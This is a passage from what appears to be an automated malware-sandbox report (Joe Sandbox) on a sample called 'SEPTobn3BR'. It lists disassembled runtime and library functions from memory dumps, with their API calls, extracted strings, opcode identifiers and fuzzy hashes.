                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                              • Instruction ID: bf7171e84a28964780af584fc0c49094966ce046d9bd4623198fa82c51a2eec4
                                                              • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                                                              • Instruction Fuzzy Hash: 37F058332102019FE661CA5AE8C8B76B3AAFFA0666F6A04A9D144B7162D360ED44CA50
                                                              Function 02C21D41 Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                                              • Instruction ID: c5effa18576a7eb6209ec52599d90799d00d0122e1d3b316ef62c0d64d3c323a
                                                              • Opcode Fuzzy Hash: b675ef751003dd94a4a5a225bc312582345a8ac16cea9a7d3627edb1bededd63
                                                              • Instruction Fuzzy Hash: D0E0B631000658EBCF227F64DD48A583B6AEB40796F490464F9098B633CF75D95ADA84
                                                              Function 02B8D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B8D225
                                                                • Part of subcall function 02B8D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B8D209
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                              • API String ID: 1646373207-1918263038
                                                              • Opcode ID: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
                                                              • Instruction ID: 5d0058bb072be7f11b8899b0803b4776b98f9683d2e4da29af0d0df4d3185def
                                                              • Opcode Fuzzy Hash: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
                                                              • Instruction Fuzzy Hash: D9418CA3A942469A5A087A7D78009377B9ADB88B50364459BB44CCF7C6DD30AC91CE3D
                                                              Function 02C2ED6C Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 376COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xF$xF
                                                              • API String ID: 269201875-3476023522
                                                              • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                              • Instruction ID: a9be8df4614a698c797c4f922e6e57a86bb42f6ee9d92e74f7ebb8da247b91e2
                                                              • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                              • Instruction Fuzzy Hash: 0DC16876E44218AFDB20DBA8CC41FDF77F99F48740F144565FA05FB281EAB09A449BA0
                                                              Function 02C2FA32 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 02C2FA6B
                                                              • ___free_lconv_mon.LIBCMT ref: 02C2FA76
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2EC8B
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2EC9D
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECAF
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECC1
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECD3
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECE5
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ECF7
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED09
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED1B
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED2D
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED3F
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED51
                                                                • Part of subcall function 02C2EC6E: _free.LIBCMT ref: 02C2ED63
                                                              • _free.LIBCMT ref: 02C2FA8D
                                                              • _free.LIBCMT ref: 02C2FAA2
                                                              • _free.LIBCMT ref: 02C2FAAD
                                                              • _free.LIBCMT ref: 02C2FACF
                                                              • _free.LIBCMT ref: 02C2FAE2
                                                              • _free.LIBCMT ref: 02C2FAF0
                                                              • _free.LIBCMT ref: 02C2FAFB
                                                              • _free.LIBCMT ref: 02C2FB33
                                                              • _free.LIBCMT ref: 02C2FB3A
                                                              • _free.LIBCMT ref: 02C2FB57
                                                              • _free.LIBCMT ref: 02C2FB6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$___free_lconv_mon
                                                              • String ID: xF
                                                              • API String ID: 3658870901-2169143296
                                                              • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                              • Instruction ID: 077cecee1432db2950c442a5ec490e159f967b8b8b8b6c7977df72e911f8a349
                                                              • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                              • Instruction Fuzzy Hash: DE319F31640228DFEB25AA39DD44B5BB7FAEF80350F54842DE849D75A1DF70EA88DB10
                                                              Function 02B96E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B96E66
                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B96E77
                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B96E87
                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B96E97
                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B96EA7
                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B96EB7
                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B96EC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                              • API String ID: 667068680-2233174745
                                                              • Opcode ID: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
                                                              • Instruction ID: 16742a2e6317a71aab61223cb5fb84c5ed88a992aafd58b23443e166279f5b69
                                                              • Opcode Fuzzy Hash: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
                                                              • Instruction Fuzzy Hash: 5DF050B0A897526EBB007F70DCC2EA73B5D971068471019F5F51B56D22DAB48C108F60
                                                              Function 02C2DB99 Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$___from_strstr_to_strchr_wcschr
                                                              • String ID:
                                                              • API String ID: 1963305004-0
                                                              • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                              • Instruction ID: d3b335c813ae46a2c6a859d0220894691dc13c5991813988b4830d07a63f9d2a
                                                              • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                              • Instruction Fuzzy Hash: A1D159719007706FDB25AF789C8066F7BA5EF61354F0441BEE98797280EFB19A088B91
                                                              Function 02C247F4 Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                              • Instruction ID: 35cbf59a2740daae7b142b1917548d34b54b6320a70f44bdd8dee2503d94d762
                                                              • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                              • Instruction Fuzzy Hash: 67B1D171D002159FDB29DF68C880BEEBBF5FF48304F044069E999A7242DB719949EF60
                                                              Function 02B82530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B828CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                              • API String ID: 2030045667-32948583
                                                              • Opcode ID: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
                                                              • Instruction ID: cc9acdcbb7a52f591403a0d3eb9a1f11348f33f3bd1196dd8041ca1c798c6d4d
                                                              • Opcode Fuzzy Hash: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
                                                              • Instruction Fuzzy Hash: 8EA1E030A042E48BDF21BA2CCC84BD9B6E5EB09750F1441E5ED4DAB386CB7599C5CF51
                                                              Function 02C26BBD Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                              • Instruction ID: 87f47331287aceb91ebfc77daf0a731256518d93b5a551371186661529dd60aa
                                                              • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                              • Instruction Fuzzy Hash: 0411B975150158BFCB15EF98CC41CDE3FAAEF04390B5580A1BE084F266DB71DA54AF50
                                                              Function 02BECDFD Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: $.F$6$t<F$!G$!G
                                                              • API String ID: 176396367-201192458
                                                              • Opcode ID: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                                              • Instruction ID: 1299102faea41add83f24d442eb720055237858c4e8e0f9ae25ce7bf1fd85749
                                                              • Opcode Fuzzy Hash: 7ee9b6793bad505f52b25d90490fb0d5f8a9afeb768bac4d3d28c008bec071fb
                                                              • Instruction Fuzzy Hash: 289173711083406BDA19FB30DC60EBF77FAAF91700F5445EEE08757191EF28AA49CA56
                                                              Function 02C2F191 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xF
                                                              • API String ID: 269201875-2169143296
                                                              • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                              • Instruction ID: 58b554a6abf3561cc47175527638b25cf6de5d71fa1e374f387aa64973afd3ec
                                                              • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                              • Instruction Fuzzy Hash: E961D376D00229AFDB20CF68C941BAEBBF5FF45720F14416ED848EB681EB709945DB90
                                                              Function 02B8252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • An unexpected memory leak has occurred. , xrefs: 02B82690
                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B82849
                                                              • The unexpected small block leaks are:, xrefs: 02B82707
                                                              • , xrefs: 02B82814
                                                              • Unexpected Memory Leak, xrefs: 02B828C0
                                                              • bytes: , xrefs: 02B8275D
                                                              • 7, xrefs: 02B826A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                              • API String ID: 0-2723507874
                                                              • Opcode ID: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                                                              • Instruction ID: 5287417ca808ddfeff90118f553c6ed405c537c187686baa2bcbac8853537036
                                                              • Opcode Fuzzy Hash: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                                                              • Instruction Fuzzy Hash: 5B71C034A042D88FEF21BA2CCC84BD9BAE5EB09740F1041E5E94DEB281DB758AC5CF51
                                                              Function 02C23C17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$_abort_memcmp
                                                              • String ID: C
                                                              • API String ID: 137591632-1037565863
                                                              • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                              • Instruction ID: a6c9c89575ddbfcb162da8d82e2fb119e10b2f6838e81f8411973ff6430dea3b
                                                              • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                                              • Instruction Fuzzy Hash: 33B15B75A016699FDB24DF18C888BADB7B5FF48304F5041EAD809A7350EB75AE98CF40
                                                              Function 02B8BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetThreadLocale.KERNEL32(00000000,02B8C013,?,?,00000000,00000000), ref: 02B8BD7E
                                                                • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
